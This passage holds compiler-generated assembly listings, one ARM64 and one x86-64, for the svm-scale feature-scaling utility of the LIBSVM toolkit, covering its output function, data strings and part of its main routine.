.globl _output ; -- Begin function output .p2align 2 _output: ; @output .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x9, _feature_max@GOTPAGE ldr x9, [x9, _feature_max@GOTPAGEOFF] str x9, [sp, #16] ; 8-byte Folded Spill adrp x8, _feature_min@GOTPAGE ldr x8, [x8, _feature_min@GOTPAGEOFF] str x8, [sp, #24] ; 8-byte Folded Spill stur w0, [x29, #-4] stur d0, [x29, #-16] ldr x9, [x9] ldursw x10, [x29, #-4] ldr d0, [x9, x10, lsl #3] ldr x8, [x8] ldursw x9, [x29, #-4] ldr d1, [x8, x9, lsl #3] fcmp d0, d1 cset w8, ne tbnz w8, #0, LBB4_2 b LBB4_1 LBB4_1: b LBB4_10 LBB4_2: ldr x8, [sp, #24] ; 8-byte Folded Reload ldur d0, [x29, #-16] ldr x8, [x8] ldursw x9, [x29, #-4] ldr d1, [x8, x9, lsl #3] fcmp d0, d1 cset w8, ne tbnz w8, #0, LBB4_4 b LBB4_3 LBB4_3: adrp x8, _lower@PAGE ldr d0, [x8, _lower@PAGEOFF] stur d0, [x29, #-16] b LBB4_8 LBB4_4: ldr x8, [sp, #16] ; 8-byte Folded Reload ldur d0, [x29, #-16] ldr x8, [x8] ldursw x9, [x29, #-4] ldr d1, [x8, x9, lsl #3] fcmp d0, d1 cset w8, ne tbnz w8, #0, LBB4_6 b LBB4_5 LBB4_5: adrp x8, _upper@PAGE ldr d0, [x8, _upper@PAGEOFF] stur d0, [x29, #-16] b LBB4_7 LBB4_6: ldr x8, [sp, #24] ; 8-byte Folded Reload ldr x9, [sp, #16] ; 8-byte Folded Reload adrp x10, _lower@PAGE ldr d0, [x10, _lower@PAGEOFF] adrp x11, _upper@PAGE ldr d1, [x11, _upper@PAGEOFF] ldr d2, [x10, _lower@PAGEOFF] fsub d1, d1, d2 ldur d2, [x29, #-16] ldr x10, [x8] ldursw x11, [x29, #-4] ldr d3, [x10, x11, lsl #3] fsub d2, d2, d3 fmul d1, d1, d2 ldr x9, [x9] ldursw x10, [x29, #-4] ldr d2, [x9, x10, lsl #3] ldr x8, [x8] ldursw x9, [x29, #-4] ldr d3, [x8, x9, lsl #3] fsub d2, d2, d3 fdiv d1, d1, d2 fadd d0, d0, d1 stur d0, [x29, #-16] b LBB4_7 LBB4_7: b LBB4_8 LBB4_8: ldur d0, [x29, #-16] fcmp d0, #0.0 cset w8, eq tbnz w8, #0, LBB4_10 b LBB4_9 LBB4_9: ldur w8, [x29, #-4] ; implicit-def: $x9 mov x9, x8 ldur d0, [x29, #-16] mov x8, sp str x9, [x8] str d0, [x8, #8] adrp x0, l_.str.21@PAGE add x0, x0, l_.str.21@PAGEOFF bl _printf adrp x9, _new_num_nonzeros@PAGE ldr x8, [x9, _new_num_nonzeros@PAGEOFF] add x8, x8, #1 str x8, [x9, _new_num_nonzeros@PAGEOFF] b LBB4_10 LBB4_10: ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Usage: svm-scale [options] data_filename\noptions:\n-l lower : x scaling lower limit (default -1)\n-u upper : x scaling upper limit (default +1)\n-y y_lower y_upper : y scaling limits (default: no y scaling)\n-s save_filename : save scaling parameters to save_filename\n-r restore_filename : restore scaling parameters from restore_filename\n" .globl _line ; @line .zerofill __DATA,__common,_line,8,3 .section __DATA,__data .globl _max_line_len ; @max_line_len .p2align 2 _max_line_len: .long 1024 ; 0x400 .globl _lower ; @lower .p2align 3 _lower: .quad 0xbff0000000000000 ; double -1 .globl _upper ; @upper .p2align 3 _upper: .quad 0x3ff0000000000000 ; double 1 .globl _y_scaling ; @y_scaling .zerofill __DATA,__common,_y_scaling,4,2 .globl _y_max ; @y_max .p2align 3 _y_max: .quad 0xffefffffffffffff ; double -1.7976931348623157E+308 .globl _y_min ; @y_min .p2align 3 _y_min: .quad 0x7fefffffffffffff ; double 1.7976931348623157E+308 .globl _num_nonzeros ; @num_nonzeros .zerofill __DATA,__common,_num_nonzeros,8,3 .globl _new_num_nonzeros ; @new_num_nonzeros .zerofill __DATA,__common,_new_num_nonzeros,8,3 .comm _y_lower,8,3 ; @y_lower .comm _y_upper,8,3 ; @y_upper .section __TEXT,__cstring,cstring_literals l_.str.1: ; @.str.1 .asciz "unknown option\n" l_.str.2: ; @.str.2 .asciz "inconsistent lower/upper specification\n" l_.str.3: ; @.str.3 .asciz "cannot use -r and -s simultaneously\n" l_.str.4: ; @.str.4 .asciz "r" l_.str.5: ; @.str.5 .asciz "can't open file %s\n" .comm _max_index,4,2 ; @max_index l_.str.6: ; @.str.6 .asciz "%d %*f %*f\n" l_.str.7: ; @.str.7 .asciz "%d:%*f" .comm _feature_max,8,3 ; @feature_max .comm _feature_min,8,3 ; @feature_min l_.str.8: ; @.str.8 .asciz "can't allocate enough memory\n" l_.str.9: ; @.str.9 .asciz "%lf" l_.str.10: ; @.str.10 .asciz "%d:%lf" l_.str.11: ; @.str.11 .asciz "%lf %lf\n" l_.str.12: ; @.str.12 .asciz "%d %lf %lf\n" l_.str.13: ; @.str.13 .asciz "w" l_.str.14: ; @.str.14 .asciz "y\n" l_.str.15: ; @.str.15 .asciz "%.16g %.16g\n" l_.str.16: ; @.str.16 .asciz "x\n" l_.str.17: ; @.str.17 .asciz "%d %.16g %.16g\n" l_.str.18: ; @.str.18 .asciz "\n" l_.str.19: ; @.str.19 .asciz "Warning: original #nonzeros %ld\n new #nonzeros %ld\nUse -l 0 if many original feature values are zeros\n" l_.str.20: ; @.str.20 .asciz "%g " l_.str.21: ; @.str.21 .asciz "%d:%g " .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _exit_with_help ## -- Begin function exit_with_help .p2align 4, 0x90 _exit_with_help: ## @exit_with_help .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp leaq L_.str(%rip), %rdi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _printf movl $1, %edi callq _exit .cfi_endproc ## -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ## -- Begin function main LCPI1_0: .quad 0x7fefffffffffffff ## double 1.7976931348623157E+308 LCPI1_1: .quad 0xffefffffffffffff ## double -1.7976931348623157E+308 .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $272, %rsp ## imm = 0x110 movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) movq $0, -40(%rbp) movq $0, -48(%rbp) movq $0, -56(%rbp) movl $1, -20(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax cmpl -8(%rbp), %eax jge LBB1_13 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movq -16(%rbp), %rax movslq -20(%rbp), %rcx movq (%rax,%rcx,8), %rax movsbl (%rax), %eax cmpl $45, %eax je LBB1_4 ## %bb.3: jmp LBB1_13 LBB1_4: ## in Loop: Header=BB1_1 Depth=1 movl -20(%rbp), %eax incl %eax movl %eax, -20(%rbp) movq -16(%rbp), %rax movl -20(%rbp), %ecx decl %ecx movslq %ecx, %rcx movq (%rax,%rcx,8), %rax movsbl 1(%rax), %eax addl $-108, %eax movl %eax, %ecx movq %rcx, -176(%rbp) ## 8-byte Spill subl $13, %eax ja LBB1_10 ## %bb.182: ## in Loop: Header=BB1_1 Depth=1 movq -176(%rbp), %rax ## 8-byte Reload leaq LJTI1_0(%rip), %rcx movslq (%rcx,%rax,4), %rax addq %rcx, %rax jmpq *%rax LBB1_5: ## in Loop: Header=BB1_1 Depth=1 movq -16(%rbp), %rax movslq -20(%rbp), %rcx movq (%rax,%rcx,8), %rdi callq _atof movsd %xmm0, _lower(%rip) jmp LBB1_11 LBB1_6: ## in Loop: Header=BB1_1 Depth=1 movq -16(%rbp), %rax movslq -20(%rbp), %rcx movq (%rax,%rcx,8), %rdi callq _atof movsd %xmm0, _upper(%rip) jmp LBB1_11 LBB1_7: ## in Loop: Header=BB1_1 Depth=1 movq -16(%rbp), %rax movslq -20(%rbp), %rcx movq (%rax,%rcx,8), %rdi callq _atof movq _y_lower@GOTPCREL(%rip), %rax movsd %xmm0, (%rax) movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) movq -16(%rbp), %rax movslq -20(%rbp), %rcx movq (%rax,%rcx,8), %rdi callq _atof movq _y_upper@GOTPCREL(%rip), %rax movsd %xmm0, (%rax) movl $1, _y_scaling(%rip) jmp LBB1_11 LBB1_8: ## in Loop: Header=BB1_1 Depth=1 movq -16(%rbp), %rax movslq -20(%rbp), %rcx movq (%rax,%rcx,8), %rax movq %rax, -48(%rbp) jmp LBB1_11 LBB1_9: ## in Loop: Header=BB1_1 Depth=1 movq -16(%rbp), %rax movslq -20(%rbp), %rcx movq (%rax,%rcx,8), %rax movq %rax, -56(%rbp) jmp LBB1_11 LBB1_10: ## in Loop: Header=BB1_1 Depth=1 movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.1(%rip), %rsi movb $0, %al callq _fprintf callq _exit_with_help LBB1_11: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_12 LBB1_12: ## in Loop: Header=BB1_1 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB1_1 LBB1_13: movsd _upper(%rip), %xmm0 ## xmm0 = mem[0],zero ucomisd _lower(%rip), %xmm0 jbe LBB1_16 ## %bb.14: cmpl $0, _y_scaling(%rip) je LBB1_17 ## %bb.15: movq _y_upper@GOTPCREL(%rip), %rax movsd (%rax), %xmm0 ## xmm0 = mem[0],zero movq _y_lower@GOTPCREL(%rip), %rax ucomisd (%rax), %xmm0 ja LBB1_17 LBB1_16: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.2(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl $1, %edi callq _exit LBB1_17: cmpq $0, -56(%rbp) je LBB1_20 ## %bb.18: cmpq $0, -48(%rbp) je LBB1_20 ## %bb.19: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.3(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl $1, %edi callq _exit LBB1_20: movl -8(%rbp), %eax movl -20(%rbp), %ecx addl $1, %ecx cmpl %ecx, %eax je LBB1_22 ## %bb.21: callq _exit_with_help LBB1_22: movq -16(%rbp), %rax movslq -20(%rbp), %rcx movq (%rax,%rcx,8), %rdi leaq L_.str.4(%rip), %rsi callq _fopen movq %rax, -32(%rbp) cmpq $0, -32(%rbp) jne LBB1_24 ## %bb.23: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi movq -16(%rbp), %rax movslq -20(%rbp), %rcx movq (%rax,%rcx,8), %rdx leaq L_.str.5(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl $1, %edi callq _exit LBB1_24: movslq _max_line_len(%rip), %rdi shlq $0, %rdi callq _malloc movq %rax, _line(%rip) movq _max_index@GOTPCREL(%rip), %rax movl $0, (%rax) cmpq $0, -56(%rbp) je LBB1_36 ## %bb.25: movq -56(%rbp), %rdi leaq L_.str.4(%rip), %rsi callq _fopen movq %rax, -40(%rbp) cmpq $0, -40(%rbp) jne LBB1_27 ## %bb.26: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi movq -56(%rbp), %rdx leaq L_.str.5(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl $1, %edi callq _exit LBB1_27: movq -40(%rbp), %rdi callq _fgetc movl %eax, -64(%rbp) cmpl $121, -64(%rbp) jne LBB1_29 ## %bb.28: movq -40(%rbp), %rdi callq _readline movq -40(%rbp), %rdi callq _readline movq -40(%rbp), %rdi callq _readline LBB1_29: movq -40(%rbp), %rdi callq _readline movq -40(%rbp), %rdi callq _readline LBB1_30: ## =>This Inner Loop Header: Depth=1 movq -40(%rbp), %rdi leaq L_.str.6(%rip), %rsi leaq -60(%rbp), %rdx movb $0, %al callq _fscanf cmpl $1, %eax jne LBB1_35 ## %bb.31: ## in Loop: Header=BB1_30 Depth=1 movl -60(%rbp), %eax movq _max_index@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jle LBB1_33 ## %bb.32: ## in Loop: Header=BB1_30 Depth=1 movl -60(%rbp), %eax movl %eax, -180(%rbp) ## 4-byte Spill jmp LBB1_34 LBB1_33: ## in Loop: Header=BB1_30 Depth=1 movq _max_index@GOTPCREL(%rip), %rax movl (%rax), %eax movl %eax, -180(%rbp) ## 4-byte Spill LBB1_34: ## in Loop: Header=BB1_30 Depth=1 movl -180(%rbp), %ecx ## 4-byte Reload movq _max_index@GOTPCREL(%rip), %rax movl %ecx, (%rax) jmp LBB1_30 LBB1_35: movq -40(%rbp), %rdi callq _rewind LBB1_36: jmp LBB1_37 LBB1_37: ## =>This Loop Header: Depth=1 ## Child Loop BB1_39 Depth 2 ## Child Loop BB1_42 Depth 2 ## Child Loop BB1_45 Depth 2 ## Child Loop BB1_50 Depth 3 ## Child Loop BB1_53 Depth 3 ## Child Loop BB1_56 Depth 3 movq -32(%rbp), %rdi callq _readline cmpq $0, %rax je LBB1_62 ## %bb.38: ## in Loop: Header=BB1_37 Depth=1 movq _line(%rip), %rax movq %rax, -72(%rbp) LBB1_39: ## Parent Loop BB1_37 Depth=1 ## => This Inner Loop Header: Depth=2 movq -72(%rbp), %rax movsbl (%rax), %edi callq _isspace cmpl $0, %eax je LBB1_41 ## %bb.40: ## in Loop: Header=BB1_39 Depth=2 movq -72(%rbp), %rax addq $1, %rax movq %rax, -72(%rbp) jmp LBB1_39 LBB1_41: ## in Loop: Header=BB1_37 Depth=1 jmp LBB1_42 LBB1_42: ## Parent Loop BB1_37 Depth=1 ## => This Inner Loop Header: Depth=2 movq -72(%rbp), %rax movsbl (%rax), %edi callq _isspace cmpl $0, %eax setne %al xorb $-1, %al testb $1, %al jne LBB1_43 jmp LBB1_44 LBB1_43: ## in Loop: Header=BB1_42 Depth=2 movq -72(%rbp), %rax addq $1, %rax movq %rax, -72(%rbp) jmp LBB1_42 LBB1_44: ## in Loop: Header=BB1_37 Depth=1 jmp LBB1_45 LBB1_45: ## Parent Loop BB1_37 Depth=1 ## => This Loop Header: Depth=2 ## Child Loop BB1_50 Depth 3 ## Child Loop BB1_53 Depth 3 ## Child Loop BB1_56 Depth 3 movq -72(%rbp), %rdi leaq L_.str.7(%rip), %rsi leaq -24(%rbp), %rdx movb $0, %al callq _sscanf cmpl $1, %eax jne LBB1_61 ## %bb.46: ## in Loop: Header=BB1_45 Depth=2 movq _max_index@GOTPCREL(%rip), %rax movl (%rax), %eax cmpl -24(%rbp), %eax jle LBB1_48 ## %bb.47: ## in Loop: Header=BB1_45 Depth=2 movq _max_index@GOTPCREL(%rip), %rax movl (%rax), %eax movl %eax, -184(%rbp) ## 4-byte Spill jmp LBB1_49 LBB1_48: ## in Loop: Header=BB1_45 Depth=2 movl -24(%rbp), %eax movl %eax, -184(%rbp) ## 4-byte Spill LBB1_49: ## in Loop: Header=BB1_45 Depth=2 movl -184(%rbp), %ecx ## 4-byte Reload movq _max_index@GOTPCREL(%rip), %rax movl %ecx, (%rax) LBB1_50: ## Parent Loop BB1_37 Depth=1 ## Parent Loop BB1_45 Depth=2 ## => This Inner Loop Header: Depth=3 movq -72(%rbp), %rax movsbl (%rax), %eax cmpl $58, %eax je LBB1_52 ## %bb.51: ## in Loop: Header=BB1_50 Depth=3 movq -72(%rbp), %rax addq $1, %rax movq %rax, -72(%rbp) jmp LBB1_50 LBB1_52: ## in Loop: Header=BB1_45 Depth=2 movq -72(%rbp), %rax addq $1, %rax movq %rax, -72(%rbp) LBB1_53: ## Parent Loop BB1_37 Depth=1 ## Parent Loop BB1_45 Depth=2 ## => This Inner Loop Header: Depth=3 movq -72(%rbp), %rax movsbl (%rax), %edi callq _isspace cmpl $0, %eax je LBB1_55 ## %bb.54: ## in Loop: Header=BB1_53 Depth=3 movq -72(%rbp), %rax addq $1, %rax movq %rax, -72(%rbp) jmp LBB1_53 LBB1_55: ## in Loop: Header=BB1_45 Depth=2 jmp LBB1_56 LBB1_56: ## Parent Loop BB1_37 Depth=1 ## Parent Loop BB1_45 Depth=2 ## => This Inner Loop Header: Depth=3 movq -72(%rbp), %rax movsbl (%rax), %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, %ecx movb %al, -185(%rbp) ## 1-byte Spill je LBB1_58 ## %bb.57: ## in Loop: Header=BB1_56 Depth=3 movq -72(%rbp), %rax movsbl (%rax), %edi callq _isspace cmpl $0, %eax setne %al xorb $-1, %al movb %al, -185(%rbp) ## 1-byte Spill LBB1_58: ## in Loop: Header=BB1_56 Depth=3 movb -185(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB1_59 jmp LBB1_60 LBB1_59: ## in Loop: Header=BB1_56 Depth=3 movq -72(%rbp), %rax addq $1, %rax movq %rax, -72(%rbp) jmp LBB1_56 LBB1_60: ## in Loop: Header=BB1_45 Depth=2 movq _num_nonzeros(%rip), %rax addq $1, %rax movq %rax, _num_nonzeros(%rip) jmp LBB1_45 LBB1_61: ## in Loop: Header=BB1_37 Depth=1 jmp LBB1_37 LBB1_62: movq -32(%rbp), %rdi callq _rewind movq _max_index@GOTPCREL(%rip), %rax movl (%rax), %eax addl $1, %eax movslq %eax, %rdi shlq $3, %rdi callq _malloc movq %rax, %rcx movq _feature_max@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq _max_index@GOTPCREL(%rip), %rax movl (%rax), %eax addl $1, %eax movslq %eax, %rdi shlq $3, %rdi callq _malloc movq %rax, %rcx movq _feature_min@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq _feature_max@GOTPCREL(%rip), %rax cmpq $0, (%rax) je LBB1_64 ## %bb.63: movq _feature_min@GOTPCREL(%rip), %rax cmpq $0, (%rax) jne LBB1_65 LBB1_64: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.8(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl $1, %edi callq _exit LBB1_65: movl $0, -20(%rbp) LBB1_66: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax movq _max_index@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jg LBB1_69 ## %bb.67: ## in Loop: Header=BB1_66 Depth=1 movq _feature_max@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsd LCPI1_1(%rip), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, (%rax,%rcx,8) movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, (%rax,%rcx,8) ## %bb.68: ## in Loop: Header=BB1_66 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB1_66 LBB1_69: jmp LBB1_70 LBB1_70: ## =>This Loop Header: Depth=1 ## Child Loop BB1_78 Depth 2 ## Child Loop BB1_81 Depth 2 ## Child Loop BB1_84 Depth 2 ## Child Loop BB1_86 Depth 3 ## Child Loop BB1_102 Depth 3 ## Child Loop BB1_105 Depth 3 ## Child Loop BB1_108 Depth 3 ## Child Loop BB1_114 Depth 2 movq -32(%rbp), %rdi callq _readline cmpq $0, %rax je LBB1_124 ## %bb.71: ## in Loop: Header=BB1_70 Depth=1 movq _line(%rip), %rax movq %rax, -80(%rbp) movl $1, -84(%rbp) movq -80(%rbp), %rdi leaq L_.str.9(%rip), %rsi leaq -96(%rbp), %rdx movb $0, %al callq _sscanf movsd _y_max(%rip), %xmm0 ## xmm0 = mem[0],zero ucomisd -96(%rbp), %xmm0 jbe LBB1_73 ## %bb.72: ## in Loop: Header=BB1_70 Depth=1 movsd _y_max(%rip), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -200(%rbp) ## 8-byte Spill jmp LBB1_74 LBB1_73: ## in Loop: Header=BB1_70 Depth=1 movsd -96(%rbp), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -200(%rbp) ## 8-byte Spill LBB1_74: ## in Loop: Header=BB1_70 Depth=1 movsd -200(%rbp), %xmm0 ## 8-byte Reload ## xmm0 = mem[0],zero movsd %xmm0, _y_max(%rip) movsd _y_min(%rip), %xmm1 ## xmm1 = mem[0],zero movsd -96(%rbp), %xmm0 ## xmm0 = mem[0],zero ucomisd %xmm1, %xmm0 jbe LBB1_76 ## %bb.75: ## in Loop: Header=BB1_70 Depth=1 movsd _y_min(%rip), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -208(%rbp) ## 8-byte Spill jmp LBB1_77 LBB1_76: ## in Loop: Header=BB1_70 Depth=1 movsd -96(%rbp), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -208(%rbp) ## 8-byte Spill LBB1_77: ## in Loop: Header=BB1_70 Depth=1 movsd -208(%rbp), %xmm0 ## 8-byte Reload ## xmm0 = mem[0],zero movsd %xmm0, _y_min(%rip) LBB1_78: ## Parent Loop BB1_70 Depth=1 ## => This Inner Loop Header: Depth=2 movq -80(%rbp), %rax movsbl (%rax), %edi callq _isspace cmpl $0, %eax je LBB1_80 ## %bb.79: ## in Loop: Header=BB1_78 Depth=2 movq -80(%rbp), %rax addq $1, %rax movq %rax, -80(%rbp) jmp LBB1_78 LBB1_80: ## in Loop: Header=BB1_70 Depth=1 jmp LBB1_81 LBB1_81: ## Parent Loop BB1_70 Depth=1 ## => This Inner Loop Header: Depth=2 movq -80(%rbp), %rax movsbl (%rax), %edi callq _isspace cmpl $0, %eax setne %al xorb $-1, %al testb $1, %al jne LBB1_82 jmp LBB1_83 LBB1_82: ## in Loop: Header=BB1_81 Depth=2 movq -80(%rbp), %rax addq $1, %rax movq %rax, -80(%rbp) jmp LBB1_81 LBB1_83: ## in Loop: Header=BB1_70 Depth=1 jmp LBB1_84 LBB1_84: ## Parent Loop BB1_70 Depth=1 ## => This Loop Header: Depth=2 ## Child Loop BB1_86 Depth 3 ## Child Loop BB1_102 Depth 3 ## Child Loop BB1_105 Depth 3 ## Child Loop BB1_108 Depth 3 movq -80(%rbp), %rdi leaq L_.str.10(%rip), %rsi leaq -24(%rbp), %rdx leaq -104(%rbp), %rcx movb $0, %al callq _sscanf cmpl $2, %eax jne LBB1_113 ## %bb.85: ## in Loop: Header=BB1_84 Depth=2 movl -84(%rbp), %eax movl %eax, -20(%rbp) LBB1_86: ## Parent Loop BB1_70 Depth=1 ## Parent Loop BB1_84 Depth=2 ## => This Inner Loop Header: Depth=3 movl -20(%rbp), %eax cmpl -24(%rbp), %eax jge LBB1_95 ## %bb.87: ## in Loop: Header=BB1_86 Depth=3 movq _feature_max@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero xorps %xmm1, %xmm1 ucomisd %xmm1, %xmm0 jbe LBB1_89 ## %bb.88: ## in Loop: Header=BB1_86 Depth=3 movq _feature_max@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -216(%rbp) ## 8-byte Spill jmp LBB1_90 LBB1_89: ## in Loop: Header=BB1_86 Depth=3 xorps %xmm0, %xmm0 movsd %xmm0, -216(%rbp) ## 8-byte Spill jmp LBB1_90 LBB1_90: ## in Loop: Header=BB1_86 Depth=3 movsd -216(%rbp), %xmm0 ## 8-byte Reload ## xmm0 = mem[0],zero movq _feature_max@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsd %xmm0, (%rax,%rcx,8) movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx xorps %xmm0, %xmm0 ucomisd (%rax,%rcx,8), %xmm0 jbe LBB1_92 ## %bb.91: ## in Loop: Header=BB1_86 Depth=3 movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -224(%rbp) ## 8-byte Spill jmp LBB1_93 LBB1_92: ## in Loop: Header=BB1_86 Depth=3 xorps %xmm0, %xmm0 movsd %xmm0, -224(%rbp) ## 8-byte Spill jmp LBB1_93 LBB1_93: ## in Loop: Header=BB1_86 Depth=3 movsd -224(%rbp), %xmm0 ## 8-byte Reload ## xmm0 = mem[0],zero movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsd %xmm0, (%rax,%rcx,8) ## %bb.94: ## in Loop: Header=BB1_86 Depth=3 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB1_86 LBB1_95: ## in Loop: Header=BB1_84 Depth=2 movq _feature_max@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -24(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero ucomisd -104(%rbp), %xmm0 jbe LBB1_97 ## %bb.96: ## in Loop: Header=BB1_84 Depth=2 movq _feature_max@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -24(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -232(%rbp) ## 8-byte Spill jmp LBB1_98 LBB1_97: ## in Loop: Header=BB1_84 Depth=2 movsd -104(%rbp), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -232(%rbp) ## 8-byte Spill LBB1_98: ## in Loop: Header=BB1_84 Depth=2 movsd -232(%rbp), %xmm0 ## 8-byte Reload ## xmm0 = mem[0],zero movq _feature_max@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -24(%rbp), %rcx movsd %xmm0, (%rax,%rcx,8) movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -24(%rbp), %rcx movsd (%rax,%rcx,8), %xmm1 ## xmm1 = mem[0],zero movsd -104(%rbp), %xmm0 ## xmm0 = mem[0],zero ucomisd %xmm1, %xmm0 jbe LBB1_100 ## %bb.99: ## in Loop: Header=BB1_84 Depth=2 movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -24(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -240(%rbp) ## 8-byte Spill jmp LBB1_101 LBB1_100: ## in Loop: Header=BB1_84 Depth=2 movsd -104(%rbp), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -240(%rbp) ## 8-byte Spill LBB1_101: ## in Loop: Header=BB1_84 Depth=2 movsd -240(%rbp), %xmm0 ## 8-byte Reload ## xmm0 = mem[0],zero movq _feature_min@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -24(%rbp), %rcx movsd %xmm0, (%rax,%rcx,8) LBB1_102: ## Parent Loop BB1_70 Depth=1 ## Parent Loop BB1_84 Depth=2 ## => This Inner Loop Header: Depth=3 movq -80(%rbp), %rax movsbl (%rax), %eax cmpl $58, %eax je LBB1_104 ## %bb.103: ## in Loop: Header=BB1_102 Depth=3 movq -80(%rbp), %rax addq $1, %rax movq %rax, -80(%rbp) jmp LBB1_102 LBB1_104: ## in Loop: Header=BB1_84 Depth=2 movq -80(%rbp), %rax addq $1, %rax movq %rax, -80(%rbp) LBB1_105: ## Parent Loop BB1_70 Depth=1 ## Parent Loop BB1_84 Depth=2 ## => This Inner Loop Header: Depth=3 movq -80(%rbp), %rax movsbl (%rax), %edi callq _isspace cmpl $0, %eax je LBB1_107 ## %bb.106: ## in Loop: Header=BB1_105 Depth=3 movq -80(%rbp), %rax addq $1, %rax movq %rax, -80(%rbp) jmp LBB1_105 LBB1_107: ## in Loop: Header=BB1_84 Depth=2 jmp LBB1_108 LBB1_108: ## Parent Loop BB1_70 Depth=1 ## Parent Loop BB1_84 Depth=2 ## => This Inner Loop Header: Depth=3 movq -80(%rbp), %rax movsbl (%rax), %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, %ecx movb %al, -241(%rbp) ## 1-byte Spill je LBB1_110 ## %bb.109: ## in Loop: Header=BB1_108 Depth=3 movq -80(%rbp), %rax movsbl (%rax), %edi callq _isspace cmpl $0, %eax setne %al xorb $-1, %al movb %al, -241(%rbp) ## 1-byte Spill LBB1_110: ## in Loop: Header=BB1_108 Depth=3 movb -241(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB1_111 jmp LBB1_112 LBB1_111: ## in Loop: Header=BB1_108 Depth=3 movq -80(%rbp), %rax addq $1, %rax movq %rax, -80(%rbp) jmp LBB1_108 LBB1_112: ## in Loop: Header=BB1_84 Depth=2 movl -24(%rbp), %eax addl $1, %eax movl %eax, -84(%rbp) jmp LBB1_84 LBB1_113: ## in Loop: Header=BB1_70 Depth=1 movl -84(%rbp), %eax movl %eax, -20(%rbp) LBB1_114: ## Parent Loop BB1_70 Depth=1 ## => This Inner Loop Header: Depth=2 movl -20(%rbp), %eax movq _max_index@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jg LBB1_123 ## %bb.115: ## in 